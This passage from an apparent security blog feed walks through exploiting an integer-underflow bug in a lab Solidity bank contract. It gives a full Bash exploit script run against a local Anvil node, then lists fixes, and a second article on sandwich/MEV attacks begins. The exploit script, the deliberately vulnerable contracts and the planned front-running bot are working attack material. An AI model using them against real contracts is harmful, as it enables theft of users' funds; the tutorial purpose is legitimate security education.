        require(sent, &quot;Withdrawal failed&quot;);

        // Emit a WithdrawalMade event for tracking
        emit WithdrawalMade(msg.sender, amount);
    }
}

```
&lt;/details&gt;


The backbone of the contract is a mapping called `deposits`. This mapping connects each user’s Ethereum address to the amount of Ether they’ve deposited, making it easy to track balances:

```solidity
mapping(address =&gt; uint256) public deposits;

```

The contract also includes an `owner` variable, which stores the address of the account that deployed the contract. This gives the owner specific administrative privileges:

```solidity
address public owner;

constructor() public {
    owner = msg.sender;
}

```

The `deposit` function allows users to add funds to the contract. Marked as `payable`, it ensures that users can send Ether along with their transaction. It requires the deposit to be greater than zero, updates the user’s balance in the `deposits` mapping, and emits an event for transparency:

```solidity
function deposit() public payable {
    require(msg.value &gt; 0, &quot;Deposit must be greater than 0&quot;);

    deposits[msg.sender] += msg.value;

    emit DepositMade(msg.sender, msg.value);
}

```

Everything seems fine so far, but the real trouble lies in the `withdraw` function. This function is supposed to let users withdraw Ether from their balance. However, there’s one major oversight—it doesn’t check whether the user’s balance is large enough to cover the withdrawal. Here’s the code:

```solidity
function withdraw(uint256 amount) public {
    deposits[msg.sender] -= amount;

    (bool sent, ) = msg.sender.call{value: amount}(&quot;&quot;);
    require(sent, &quot;Withdrawal failed&quot;);

    emit WithdrawalMade(msg.sender, amount);
}

```

Finally, the contract logs every deposit and withdrawal through two events, `DepositMade` and `WithdrawalMade`. These events are useful for tracking transactions and debugging but don’t prevent the underlying vulnerability.

# Exploiting the Vulnerability

Now that we understand the **DecentralizedBank** contract, let’s explore how an attacker can exploit it step by step. At first glance, the `withdraw` function seems simple—it subtracts the requested amount from the user’s balance and transfers the Ether back to their wallet. However, as we’ve seen, the lack of a proper balance check opens the door to a devastating **integer underflow** attack.

Here’s how an attacker could exploit this vulnerability:

#### Make a Small Deposit

The attacker starts by depositing a tiny amount of Ether into the contract—just 1 wei, for example. This initializes their balance in the `deposits` mapping and allows them to interact with the `withdraw` function.

#### Trigger the Underflow

Next, the attacker calls the `withdraw` function, requesting more Ether than their balance can cover—let’s say 2 wei. When the contract tries to subtract 2 wei from their balance of 1 wei, the operation causes an integer underflow. Since unsigned integers like `uint256` can’t go negative, the balance “wraps around” to the maximum possible value for a `uint256`: `2^256 - 1`, which is an astronomically large number.

At this point, the attacker’s balance has been inflated to this massive value, far exceeding the total Ether held in the contract.
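
The wrap-around is easy to verify with modular arithmetic, since unchecked `uint256` subtraction reduces the result modulo `2**256`:

```python
def sub_uint256(x, y):
    # Unchecked uint256 subtraction (Solidity before 0.8.0) wraps mod 2**256
    return (x - y) % 2**256

```

Subtracting 2 wei from a 1 wei balance yields `2**256 - 1`, roughly `1.16e77` wei, the inflated balance the attacker now holds.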

#### Drain the Contract

With their now-inflated balance, the attacker can withdraw any amount of Ether they choose. They might start with a large amount, such as 5 ETH, and continue making withdrawals until the contract’s funds are completely drained.

```mermaid
sequenceDiagram
    participant Attacker
    participant Contract
    participant Blockchain

    Attacker-&gt;&gt;Contract: deposit(1 wei)
    Contract--&gt;&gt;Attacker: Balance updated to 1 wei
    Attacker-&gt;&gt;Contract: withdraw(2 wei)
    Note right of Contract: Subtracts 2 wei from 1 wei&lt;br&gt;Integer underflow: Balance becomes 2^256 - 1
    Contract--&gt;&gt;Attacker: 2 wei transferred
    Attacker-&gt;&gt;Contract: withdraw(5 ETH)
    Note right of Contract: Contract attempts to send&lt;br&gt;funds to the attacker
    Contract--&gt;&gt;Attacker: 5 ETH transferred
    Contract-&gt;&gt;Blockchain: Contract drained

```

## The Exploit Script

Now that we’ve seen how the vulnerability works, let’s walk through how the exploit can be executed in practice. To simulate this attack, we’ll use a **Bash script** with tools like `cast` to interact with the contract in a controlled environment.

&lt;details&gt;
&lt;summary&gt;Exploit Script&lt;/summary&gt;

```bash
#!/bin/bash

# Force numeric format to English (dot as the decimal separator)
export LC_NUMERIC=&quot;en_US.UTF-8&quot;

# Configuration variables
RPC_URL=&quot;http://localhost:8545&quot;
OWNER_PK=&quot;0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80&quot;
ATTACKER_PK=&quot;0x59c6995e998f97a5a0044966f0945389dc9e86dae88c7a8412f4603b6b78690d&quot;
CONTRACT_NAME=&quot;DecentralizedBank&quot;
CONTRACT_PATH=&quot;src/DecentralizedBank.sol:$CONTRACT_NAME&quot;

# Compile the contract
echo &quot;Compiling the contract...&quot;
forge build

# Deploy the contract
echo &quot;Deploying the contract $CONTRACT_NAME...&quot;
CONTRACT_ADDRESS=$(forge create $CONTRACT_PATH \
                             --rpc-url $RPC_URL \
                             --private-key $OWNER_PK | grep &quot;Deployed to&quot; | awk &apos;{print $NF}&apos;)

if [ -z &quot;$CONTRACT_ADDRESS&quot; ]; then
    echo &quot;Error: Failed to deploy the contract.&quot;
    exit 1
fi

echo &quot;Contract successfully deployed at: $CONTRACT_ADDRESS&quot;

# Owner deposits 10 ETH into the contract
echo &quot;Owner depositing 10 ETH into the contract...&quot;
cast send --rpc-url $RPC_URL \
          --private-key $OWNER_PK \
          --value 10ether \
          $CONTRACT_ADDRESS &quot;deposit()&quot;

# Attacker deposits 1 wei
echo &quot;Attacker depositing 1 wei...&quot;
cast send --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          --value 1wei \
          $CONTRACT_ADDRESS &quot;deposit()&quot;

# Check the attacker&apos;s deposit balance before the attack
echo &quot;Checking attacker&apos;s deposit balance before the attack...&quot;
ATTACKER_ADDRESS=$(cast wallet address --private-key $ATTACKER_PK)
attacker_balance_before=$(cast call --rpc-url $RPC_URL \
                 $CONTRACT_ADDRESS \
                 &quot;deposits(address)(uint256)&quot; $ATTACKER_ADDRESS)

if [ -z &quot;$attacker_balance_before&quot; ]; then
    echo &quot;Error: Unable to retrieve attacker&apos;s deposit balance before the attack.&quot;
    exit 1
fi

echo &quot;Attacker&apos;s deposit balance before the attack: $attacker_balance_before wei&quot;

# Attacker attempts to withdraw 2 wei
echo &quot;Attacker attempting to withdraw 2 wei (causing underflow)...&quot;
cast send --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          $CONTRACT_ADDRESS &quot;withdraw(uint256)&quot; 2

# Check the attacker&apos;s deposit balance after underflow
echo &quot;Checking attacker&apos;s deposit balance after underflow...&quot;
attacker_balance_after=$(cast call --rpc-url $RPC_URL \
                 $CONTRACT_ADDRESS \
                 &quot;deposits(address)(uint256)&quot; $ATTACKER_ADDRESS)

if [ -z &quot;$attacker_balance_after&quot; ]; then
    echo &quot;Error: Unable to retrieve attacker&apos;s deposit balance after underflow.&quot;
    exit 1
fi

echo &quot;Attacker&apos;s deposit balance after underflow: $attacker_balance_after wei&quot;


# Attacker withdraws a specific amount
echo &quot;Attacker attempting to withdraw 5 ETH...&quot;
cast send --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          $CONTRACT_ADDRESS &quot;withdraw(uint256)&quot; 5000000000000000000

# Display the attacker&apos;s Ether balance after the withdrawal
echo &quot;Checking attacker&apos;s Ether balance after the withdrawal...&quot;
attacker_eth_balance=$(cast balance $ATTACKER_ADDRESS --rpc-url $RPC_URL)

# Convert balance from wei to ETH for readability
attacker_eth_balance_eth=$(awk &quot;BEGIN {print $attacker_eth_balance / 10^18}&quot;)

echo &quot;Attacker&apos;s Ether balance after withdrawal: $attacker_eth_balance_eth ETH&quot;


```
&lt;/details&gt;


The script begins by setting up the environment. It defines the **RPC\_URL** to connect to the local blockchain environment (Anvil) and includes private keys for both the contract owner and the attacker. These are Anvil’s well-known default test keys, so they are safe to publish:

```bash
RPC_URL=&quot;http://localhost:8545&quot;
OWNER_PK=&quot;0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80&quot;
ATTACKER_PK=&quot;0x59c6995e998f97a5a0044966f0945389dc9e86dae88c7a8412f4603b6b78690d&quot;

```

Next, the **DecentralizedBank** contract is deployed using `forge`, and its address is stored for future interactions. This ensures we can reference the deployed contract throughout the script:

```bash
CONTRACT_ADDRESS=$(forge create $CONTRACT_PATH \
                             --rpc-url $RPC_URL \
                             --private-key $OWNER_PK | grep &quot;Deployed to&quot; | awk &apos;{print $NF}&apos;)

```

This command compiles the contract and deploys it, capturing the deployed address for subsequent interactions. If deployment fails, the script gracefully exits to avoid further errors:

```bash
if [ -z &quot;$CONTRACT_ADDRESS&quot; ]; then
    echo &quot;Error: Failed to deploy the contract.&quot;
    exit 1
fi

```

After deploying the contract, the owner funds it with 10 ETH. This step ensures the contract has sufficient funds for the exploit:

```bash
cast send --rpc-url $RPC_URL \
          --private-key $OWNER_PK \
          --value 10ether \
          $CONTRACT_ADDRESS &quot;deposit()&quot;

```

With the contract ready, the attacker makes a small deposit of 1 wei. This initializes their balance in the contract’s `deposits` mapping, setting the stage for the exploit:

```bash
cast send --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          --value 1wei \
          $CONTRACT_ADDRESS &quot;deposit()&quot;

```

Before proceeding with the attack, the script queries and prints the attacker’s balance to verify it reflects the initial deposit. This ensures the setup is accurate:

```bash
ATTACKER_ADDRESS=$(cast wallet address --private-key $ATTACKER_PK)
attacker_balance_before=$(cast call --rpc-url $RPC_URL \
                 $CONTRACT_ADDRESS \
                 &quot;deposits(address)(uint256)&quot; $ATTACKER_ADDRESS)

```

Now, the attacker triggers the vulnerability by attempting to withdraw 2 wei, which is more than their deposit. This withdrawal causes the integer underflow, inflating their balance to the maximum possible value for a `uint256`:

```bash
cast send --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          $CONTRACT_ADDRESS &quot;withdraw(uint256)&quot; 2

```

After the exploit, the script queries and prints the attacker’s inflated balance, confirming the vulnerability has been successfully triggered:

```bash
attacker_balance_after=$(cast call --rpc-url $RPC_URL \
                 $CONTRACT_ADDRESS \
                 &quot;deposits(address)(uint256)&quot; $ATTACKER_ADDRESS)

```
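The inflated value is easy to reproduce off-chain. The snippet below is a Python model of the EVM’s wrapping arithmetic under pre-0.8 semantics, not the contract itself:

```python
# Model of unchecked uint256 subtraction (pre-0.8 Solidity semantics):
# results wrap modulo 2**256 instead of reverting.
UINT256_MAX = 2**256 - 1

def unchecked_sub(a, b):
    # The EVM wraps the result modulo 2**256 when no checks are in place
    return (a - b) % 2**256

balance = unchecked_sub(1, 2)   # deposit of 1 wei, withdrawal of 2 wei
assert balance == UINT256_MAX   # balance is now the maximum uint256
```

Any subtraction that would drop below zero lands at the very top of the `uint256` range, which is exactly the balance the script prints.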

Finally, the attacker withdraws 5 ETH from the contract to demonstrate the exploit’s impact. The script also checks and prints the attacker’s total Ether balance after the withdrawal:

```bash
# Attacker withdraws a specific amount
echo &quot;Attacker attempting to withdraw 5 ETH...&quot;
cast send --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          $CONTRACT_ADDRESS &quot;withdraw(uint256)&quot; 5000000000000000000

# Display the attacker&apos;s Ether balance after the withdrawal
echo &quot;Checking attacker&apos;s Ether balance after the withdrawal...&quot;
attacker_eth_balance=$(cast balance $ATTACKER_ADDRESS --rpc-url $RPC_URL)

# Convert balance from wei to ETH for readability
attacker_eth_balance_eth=$(awk &quot;BEGIN {print $attacker_eth_balance / 10^18}&quot;)

echo &quot;Attacker&apos;s Ether balance after withdrawal: $attacker_eth_balance_eth ETH&quot;


```

## Running the exploit

With the exploit script ready, it’s time to put everything into action. Using **Anvil** as our local blockchain testing environment, we simulate the interactions step by step, from deploying the contract to executing the attack.

![](/content/images/2024/12/image-18.png)

Running Anvil

First, the script deploys the **DecentralizedBank** contract to Anvil. The deployment is confirmed, and the contract is assigned an address, which is stored for subsequent interactions. Once deployed, the contract owner funds it with 10 ETH, ensuring it has enough balance to handle the exploit. This initial funding lays the groundwork for the attacker to proceed.

![](/content/images/2024/12/image-23.png)

Deploying the contract

Next, the attacker makes their move by depositing 1 wei into the contract. Although this is an insignificant amount, it’s a crucial step as it initializes their balance in the `deposits` mapping, allowing them to interact with the `withdraw` function. The script verifies the attacker’s balance after this deposit, confirming it reflects the 1 wei accurately.

![](/content/images/2024/12/image-20.png)

Depositing 1 wei

The real exploit begins when the attacker attempts to withdraw 2 wei—more than their deposited balance. This triggers the integer underflow in the `withdraw` function, inflating the attacker’s balance to the maximum possible value for a `uint256`. The script retrieves and displays this new balance, which demonstrates the severity of the vulnerability.

![](/content/images/2024/12/image-21.png)

Withdrawing 2 wei

![](/content/images/2024/12/image-25.png)

Attack successful :)

Finally, the attacker withdraws 5 ETH from the contract to show the impact of the exploit. The script then checks and displays the attacker’s Ether balance, confirming the funds have been successfully transferred. This withdrawal illustrates how a small oversight in the contract’s logic can result in significant financial loss.

![](/content/images/2024/12/image-24.png)

Final balance after the attack

# Top 3 Solutions to Prevent Integer Underflow Vulnerabilities

Integer underflows can be devastating, but the good news is they’re entirely preventable with a few straightforward practices. Here are three effective ways to secure your smart contracts and keep them safe from these kinds of exploits.

The simplest and most reliable way to prevent underflows is to validate inputs before performing arithmetic operations. In the `withdraw` function, a quick check can block any attempt to withdraw more than the user’s current balance:

```solidity
require(deposits[msg.sender] &gt;= amount, &quot;Insufficient balance&quot;);

```

This one-liner acts like a bouncer at the club, ensuring that no invalid operations sneak through. It’s easy to implement and should be a default habit for any developer working on financial systems.

Starting with Solidity 0.8.0, arithmetic errors like overflows and underflows automatically revert the transaction. This means you don’t need extra checks or libraries—modern Solidity versions have your back:

```solidity
deposits[msg.sender] -= amount;

```

If the `amount` exceeds the user’s balance, the transaction fails before anything goes wrong. It’s like having an autopilot system that steps in when a pilot makes an error.

💡 _Why struggle with extra tools when your language can handle it for you?_

If you’re working with legacy contracts written in older versions of Solidity, the **SafeMath library** from OpenZeppelin is your best friend. It wraps arithmetic operations with checks to ensure they don’t cause underflows or overflows.

Here’s how it works:

```solidity
using SafeMath for uint256;
deposits[msg.sender] = deposits[msg.sender].sub(amount);

```

SafeMath ensures the operation is valid, and if something goes wrong, the transaction is reverted. It’s like retrofitting an old car with modern safety features—backward-compatible and life-saving.
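The guarantee can be modeled in a few lines of Python. This is a sketch of the check SafeMath performs, not the library itself:

```python
# Python model of the check SafeMath.sub performs: revert (here, raise)
# instead of silently wrapping when the subtraction would underflow.
def safe_sub(a, b):
    wrapped = (a - b) % 2**256
    if wrapped != a - b:   # a - b would wrap below zero in uint256
        raise ValueError   # SafeMath reverts the transaction here
    return wrapped

assert safe_sub(10, 4) == 6
```

With this guard in place, the 1 wei deposit followed by a 2 wei withdrawal simply reverts instead of minting an astronomical balance.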

# Conclusion

This chapter exposed the devastating consequences of a simple oversight in smart contract logic. The **DecentralizedBank** contract, while functional at first glance, contained a vulnerability that allowed a complete compromise: an integer underflow that enabled an attacker to drain all funds with ease.

For those analyzing smart contracts, this highlights the importance of identifying and exploiting weak points in arithmetic operations. A missing balance validation became the entry point for a catastrophic exploit, proving that even small errors can have significant consequences when combined with the immutable nature of blockchain technology.

Modern tools and techniques make such vulnerabilities both preventable and exploitable. Solidity versions 0.8.0+ automatically handle overflows and underflows, making these issues rare in newer deployments. However, older contracts and legacy systems remain vulnerable, creating opportunities for those who understand these risks. Understanding the behavior of unsigned integers, poorly validated user inputs, and unsafe arithmetic is key to uncovering exploitable logic.

Controlled environments like **Anvil** allow for safe experimentation and verification of vulnerabilities before testing them in real-world contexts. The ability to simulate attacks, manipulate contract states, and observe outcomes without consequences is invaluable for fine-tuning techniques and strategies.

This case study also underscores the power of small, precise actions. Exploiting the contract started with a minimal deposit and escalated into a complete takeover. Success lies in attention to detail and a thorough understanding of smart contract mechanics.

The takeaways are clear: understand the system, target its weakest points, and leverage vulnerabilities efficiently. Mastering these techniques enables both the identification and execution of attacks, as well as the ability to protect against them in the future. Let’s continue refining these skills to stay ahead in the evolving world of blockchain security.

# References

-   **Foundry** - A Blazing Fast, Modular, and Portable Ethereum Development Framework. &quot;Foundry Documentation.&quot; Available at: [https://book.getfoundry.sh/](https://book.getfoundry.sh/)
-   **Solidity** - Language for Smart Contract Development. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/](https://docs.soliditylang.org/)
-   **OpenZeppelin** - Secure Smart Contract Libraries. &quot;OpenZeppelin Contracts Documentation.&quot; Available at: [https://docs.openzeppelin.com/contracts](https://docs.openzeppelin.com/contracts)
-   **Ethereum** - Open-Source Blockchain Platform for Smart Contracts. &quot;Ethereum Whitepaper.&quot; Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
-   **Anvil** - A Local Ethereum Development Node for Testing Smart Contracts. &quot;Anvil Documentation.&quot; Available at: [https://book.getfoundry.sh/anvil/](https://book.getfoundry.sh/anvil/)
-   **Integer Overflow and Underflow in Solidity** - Identifying and Preventing Arithmetic Vulnerabilities. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/en/v0.8.0/](https://docs.soliditylang.org/en/v0.8.0/)
-   **Etherscan** - Ethereum Block Explorer and Analytics Platform. &quot;Etherscan Documentation.&quot; Available at: [https://etherscan.io/](https://etherscan.io/)
-   **Cast** - Interacting with Smart Contracts and Ethereum Nodes. &quot;Foundry Documentation.&quot; Available at: [https://book.getfoundry.sh/reference/cast/](https://book.getfoundry.sh/reference/cast/)
-   **Blockchain Security** - Understanding and Mitigating Vulnerabilities in Smart Contracts. &quot;Trail of Bits Blog.&quot; Available at: [https://blog.trailofbits.com/](https://blog.trailofbits.com/)
-   **DecentralizedBank Exploit** - A Case Study on Integer Underflow Vulnerabilities. &quot;Custom Analysis.&quot; Available as described in this article.</content:encoded><author>Ruben Santos</author></item><item><title>From Front-Running to Sandwich Attacks: An Advanced Look at MEV Exploits</title><link>https://www.kayssel.com/post/web3-7</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-7</guid><description>In this chapter, we explored the mechanics of Sandwich Attacks using a vulnerable smart contract. We deployed the contract, simulated a victim&apos;s transaction, and automated the attack with a Python bot. Key takeaways include understanding slippage, private relayers, and dynamic pricing as defenses.</description><pubDate>Sun, 22 Dec 2024 10:31:33 GMT</pubDate><content:encoded># Introduction

In previous chapters, [we explored the fundamentals of front-running](https://www.kayssel.com/post/web3-5/), a type of attack where malicious actors exploit transaction ordering to gain an advantage. These tactics fall under a broader category known as **MEV (Maximal Extractable Value) attacks**, which involve manipulating the sequence of transactions in a blockchain to extract value. Today, we’re diving deeper into a specific and more advanced MEV strategy: the **Sandwich Attack**. This sophisticated method combines front-running and back-running to manipulate prices and maximize profits, often targeting decentralized exchanges (DEXs) and other Ethereum-based markets.

To truly understand the implications of a Sandwich Attack, we won’t just analyze its theory. Instead, we’ll recreate the scenario from the ground up—deploying a vulnerable contract, simulating a victim’s transaction, and leveraging a custom bot to execute the attack. Along the way, we’ll use familiar tools like **Anvil** to simulate the network, **Cast** for contract deployment and interaction, and a **Python-based bot** to automate the attack process.

By the end of this chapter, you’ll have a clear understanding of how these attacks are orchestrated, the level of sophistication involved, and, most importantly, the need for robust countermeasures in decentralized ecosystems.

# **What is a Sandwich Attack?**

Imagine you’re at a busy market, and you notice someone ahead of you about to buy the last few apples from a vendor. Knowing this, you quickly cut in line, buy the apples first, and then sell them back to that same person at a marked-up price. This, in essence, is how a Sandwich Attack works, but instead of apples, the &quot;market&quot; here is a decentralized exchange, and the &quot;line&quot; is the blockchain transaction queue.

A Sandwich Attack is a clever combination of two tactics: front-running and back-running. Here’s how it plays out:

1.  **Front-Running**: The attacker monitors the mempool (a holding area for unconfirmed transactions) and spots a pending trade, such as a token purchase. They quickly submit their own transaction—a buy order with a higher gas fee—so it gets executed first. This increases the token price before the victim’s transaction can be processed.
2.  **Victim’s Transaction**: The unsuspecting victim executes their trade, buying tokens at the now-inflated price, unaware they’ve been front-run.
3.  **Back-Running**: Immediately after the victim’s transaction is confirmed, the attacker places a sell order. By selling the tokens they just purchased at the higher price created by the victim’s trade, the attacker pockets the profit.

This strategy takes advantage of the mempool’s transparency and the predictable way blockchain transactions are prioritized by gas fees. The result is a &quot;sandwich,&quot; where the victim’s transaction is squeezed between the attacker’s buy and sell orders, leaving the victim with inflated costs and the attacker with a tidy profit.

```mermaid
sequenceDiagram
    participant Attacker
    participant Victim
    participant AMM as Automated Market Maker (AMM)

    Note over Attacker: Scans mempool for pending transactions
    Victim-&gt;&gt;AMM: Places buy order for tokens&lt;br&gt;(e.g., 10 tokens)
    AMM--&gt;&gt;Victim: Pending transaction&lt;br&gt;(Price impact: +0.01 ETH/token)
    Attacker-&gt;&gt;AMM: Front-run buy order&lt;br&gt;(e.g., 15 tokens)&lt;br&gt;Higher gas price
    AMM--&gt;&gt;Attacker: Order confirmed&lt;br&gt;(Price impact: +0.015 ETH/token)
    Victim-&gt;&gt;AMM: Victim&apos;s transaction executes&lt;br&gt;(Buys 10 tokens at inflated price)
    AMM--&gt;&gt;Victim: Order confirmed
    Attacker-&gt;&gt;AMM: Back-run sell order&lt;br&gt;(e.g., 15 tokens)&lt;br&gt;Profiting from price inflation
    AMM--&gt;&gt;Attacker: Tokens sold at inflated price
    Note over Attacker: Gains profit from the inflated price difference

```
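The profit mechanics above can be sketched with a toy Python model. The linear price impact of 0.01 ETH per token matches the figures in the diagram; real AMM curves are nonlinear and gas costs are deliberately left out:

```python
# Toy sandwich simulation with a linear price impact, as an illustration
WEI = 10**18
IMPACT = WEI // 100   # each token traded moves the price by 0.01 ETH

def sandwich_profit(price, attacker_amount, victim_amount):
    cost = attacker_amount * price        # front-run buy at the old price
    price += attacker_amount * IMPACT     # front-run pushes the price up
    price += victim_amount * IMPACT       # victim buys at the inflated price
    proceeds = attacker_amount * price    # back-run sell at the peak
    return proceeds - cost

# 15-token front-run around a 10-token victim buy, base price 1 ETH
profit = sandwich_profit(WEI, 15, 10)
assert profit == 375 * WEI // 100   # 3.75 ETH gross, before gas costs
```

The model ignores the price drop the attacker’s own sell order causes, so treat the result as an upper bound on the gross profit.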

Today, as we usually do, we’ll dive into a vulnerable contract designed for this type of attack, analyzing it using Foundry, a custom validator, and a Python bot to automate the attack.

# **Explaining the MagicPotionMarket Contract**

The `MagicPotionMarket` contract represents a dynamic marketplace where users can trade &quot;magic potions&quot; with a pricing mechanism that adjusts based on supply and demand. It’s designed as a straightforward example to explore how such markets work on the blockchain.

&lt;details&gt;
&lt;summary&gt;Vulnerable Smart Contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract MagicPotionMarket {
    mapping(address =&gt; uint256) public potionBalances;
    uint256 public potionPrice = 1 ether; // Base price of a magic potion in ETH

    event PotionsBought(address indexed buyer, uint256 amount, uint256 price);
    event PotionsSold(address indexed seller, uint256 amount, uint256 price);

    // Function to buy potions
    function buyPotions(uint256 amount) external payable {
        potionBalances[msg.sender] += amount;

        // Simulate price impact: the more potions bought, the higher the price
        potionPrice += (amount * 1 ether) / 100; // Increment by 0.01 ETH per potion
        require(potionPrice &gt; 0, &quot;Potion price overflow&quot;);

        emit PotionsBought(msg.sender, amount, potionPrice);
    }

    // Function to sell potions
    function sellPotions(uint256 amount) external {
        require(
            potionBalances[msg.sender] &gt;= amount,
            &quot;Not enough potions to sell&quot;
        );

        uint256 currentPrice = potionPrice; // Capture the price at the start
        potionBalances[msg.sender] -= amount;

        // Calculate the value of potions being sold
        uint256 saleValue = amount * currentPrice;

        // Simulate price drop: the more potions sold, the lower the price
        potionPrice -= (amount * 1 ether) / 100; // Decrement by 0.01 ETH per potion
        require(potionPrice &gt; 0, &quot;Potion price underflow&quot;);

        // Transfer ETH to the seller
        payable(msg.sender).transfer(saleValue);

        emit PotionsSold(msg.sender, amount, potionPrice);
    }

    // Allow the contract to receive ETH
    receive() external payable {}
}

```
&lt;/details&gt;


Let’s walk through its components step by step, with corresponding code snippets for clarity.

```solidity
mapping(address =&gt; uint256) public potionBalances;
uint256 public potionPrice = 1 ether; // Base price of a magic potion in ETH

```

At its core, the contract maintains a record of each user’s potion holdings through a mapping called `potionBalances`. Each address is associated with the number of potions it owns. The price of a potion starts at a fixed value of **1 ETH** but changes dynamically as users buy or sell potions, simulating real-world price fluctuations.

The choice to make both `potionBalances` and `potionPrice` public ensures transparency, allowing anyone to query the current state of the market.

```solidity
function buyPotions(uint256 amount) external payable {
    potionBalances[msg.sender] += amount;

    // Simulate price impact: the more potions bought, the higher the price
    potionPrice += (amount * 1 ether) / 100; // Increment by 0.01 ETH per potion
    require(potionPrice &gt; 0, &quot;Potion price overflow&quot;);

    emit PotionsBought(msg.sender, amount, potionPrice);
}

```

The `buyPotions` function is where users can increase their potion holdings. When a user calls this function and specifies an `amount`, the contract adds that number to their potion balance.

What makes this function interesting is its dynamic pricing mechanism. Each purchase increases the potion price by **0.01 ETH per potion bought**, simulating a supply-demand relationship. For instance, if someone buys 10 potions, the price rises by **0.1 ETH**.

To ensure the price doesn’t overflow due to extreme purchases, there’s a safeguard (`require(potionPrice &gt; 0)`) that halts execution if such a scenario is detected. Additionally, the function emits a `PotionsBought` event to log the purchase, making it easy to track activity.
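A quick Python check of the same integer arithmetic confirms the numbers quoted above (a model of the formula, not the contract):

```python
# Price increment as buyPotions computes it: (amount * 1 ether) / 100
ETHER = 10**18

def price_after_buy(price, amount):
    return price + (amount * ETHER) // 100   # plus 0.01 ETH per potion

price = price_after_buy(ETHER, 10)   # buy 10 potions at a 1 ETH base price
assert price == 110 * ETHER // 100   # price is now 1.1 ETH
```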

```solidity
function sellPotions(uint256 amount) external {
    require(
        potionBalances[msg.sender] &gt;= amount,
        &quot;Not enough potions to sell&quot;
    );

    uint256 currentPrice = potionPrice; // Capture the price at the start
    potionBalances[msg.sender] -= amount;

    // Calculate the value of potions being sold
    uint256 saleValue = amount * currentPrice;

    // Simulate price drop: the more potions sold, the lower the price
    potionPrice -= (amount * 1 ether) / 100; // Decrement by 0.01 ETH per potion
    require(potionPrice &gt; 0, &quot;Potion price underflow&quot;);

    // Transfer ETH to the seller
    payable(msg.sender).transfer(saleValue);

    emit PotionsSold(msg.sender, amount, potionPrice);
}

```

The `sellPotions` function allows users to liquidate their potions for ETH. Before proceeding, the contract checks if the seller has enough potions in their balance. If they do, the specified amount is subtracted from their balance, and the corresponding ETH is transferred to their address.

Similar to the buying process, selling potions adjusts the price dynamically—but in the opposite direction. For every potion sold, the price decreases by **0.01 ETH**, reflecting reduced demand. This creates a scenario where heavy selling can significantly lower the market price, impacting subsequent trades.

To prevent issues like underflow (a situation where the price drops below zero), the function includes a safeguard: `require(potionPrice &gt; 0)`. Finally, it logs the sale with the `PotionsSold` event.

```solidity
receive() external payable {}

```

This small but essential function allows the contract to receive ETH directly, ensuring it has enough funds to pay users who sell their potions. Without this capability, the contract could run out of ETH, causing transactions to fail.

Additionally, the contract includes events:

```solidity
event PotionsBought(address indexed buyer, uint256 amount, uint256 price);
event PotionsSold(address indexed seller, uint256 amount, uint256 price);

```

These events emit key details about every transaction, such as the buyer or seller’s address, the number of potions traded, and the updated price. This transparency is valuable for monitoring the contract but also provides real-time data for anyone observing the market.

# **Setting Up the Attack Strategy**

To replicate the conditions for a **Sandwich Attack**, we’ll use a familiar setup that combines tools and strategies we’ve already discussed in previous chapters. This will streamline the process and make it easier to understand how all the pieces fit together. Here’s how we’ll proceed:

1.  **Custom Validator for Front-Running**: We’ll use the same custom validator that we introduced in [the chapter on front-running](https://www.kayssel.com/post/web3-5/). For those who are already familiar with its workings, feel free to skip ahead. In brief, this validator monitors the mempool for pending transactions, identifying opportunities to execute front-running trades by prioritizing transactions with higher gas fees.
2.  **Network Simulation with Anvil**: As we’ve been doing in previous chapters, we’ll rely on **Anvil**, the blockchain simulation tool, to create a controlled environment. Anvil lets us mimic the behavior of a real Ethereum network while giving us fine-grained control over block production, gas pricing, and more. Its flexibility makes it an ideal choice for testing complex interactions like the Sandwich Attack.
3.  **Deployment and Victim Transaction with Cast**: We’ll continue using **Cast**, which has been our go-to tool for interacting with the network in past chapters. Cast will handle the deployment of the vulnerable `MagicPotionMarket` contract and simulate a transaction from the victim. Its simplicity and efficiency make it perfect for these tasks.
4.  **Automating the Sandwich Attack with Python**: Finally, we’ll bring everything together with a Python bot. This script will monitor the network, execute the front-running and back-running transactions, and calculate the attack’s profitability. Python’s flexibility allows us to automate the entire process, simulating how an attacker would operate in a real-world scenario.
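Before wiring these pieces together, the ordering trick at the heart of the attack can be reduced to a pure function. This is an illustrative Python sketch with hypothetical values; the real bot also has to build, sign, and submit the transactions:

```python
# Ordering logic a sandwich bot relies on: the front-run must outbid the
# victim and the back-run must land just after it. Gas prices in gwei;
# the 1 gwei premium is an arbitrary illustrative choice.
def sandwich_gas_prices(victim_gas, premium=1):
    front_run = victim_gas + premium   # mined before the victim
    back_run = victim_gas - premium    # mined after the victim
    return front_run, back_run

front, back = sandwich_gas_prices(20)
assert (front, back) == (21, 19)
```

This mirrors how the custom validator orders transactions: whoever bids the highest gas price gets mined first.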

# **Custom Validator for Front-Running**

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    &lt;strong&gt;Note&lt;/strong&gt;: If you’ve already read the chapter on front-running and are familiar with how our custom validator works, you can safely skip this section. For newcomers or those needing a refresher, here’s an accessible breakdown of how it operates.
  &lt;/div&gt;
&lt;/div&gt;

The custom validator is a critical component in executing a **Sandwich Attack**, as it allows us to monitor the mempool for pending transactions and identify potential targets. This tool interacts directly with the blockchain to detect unconfirmed transactions and analyze their parameters. To include the validator in our project, we begin by organizing our attack scripts into a dedicated directory within the Foundry project. This setup keeps everything clean and accessible.

&lt;details&gt;
&lt;summary&gt;Validator Code&lt;/summary&gt;

```javascript
const { ethers } = require(&quot;ethers&quot;);
const axios = require(&quot;axios&quot;);

// Connection to the Anvil node
